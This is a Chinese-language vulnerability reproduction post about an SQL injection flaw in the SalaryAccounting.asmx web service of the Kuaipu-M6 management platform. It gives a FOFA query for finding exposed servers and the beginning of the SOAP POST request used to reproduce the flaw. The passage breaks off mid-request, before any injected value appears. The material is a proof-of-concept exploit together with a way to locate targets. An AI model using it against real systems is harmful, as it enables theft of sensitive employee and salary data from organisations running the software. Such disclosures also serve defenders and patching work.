产品简介
Kuaipu-M6整合管理平台系统是厦门快普信息技术有限公司累积近15年的IT经营历程和IT管理咨询实践研发而成的中小企业整合管理及业务应用软件。
漏洞描述
厦门快普信息技术有限公司Kuaipu-M6整合管理平台系统SalaryAccounting.asmx接口存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
fofa
app=”快普-M6”
漏洞复现
POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: 676
SOAPAction: "http://tempuri.org/Calculate"
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:Calculate>
<!--type: string-->
<tem:SalaryCategory></tem:SalaryCategory>
<!--type: string-->
<tem:StaffBirthDay></tem:StaffBirthDay>
<!--type: string-->
<tem:sta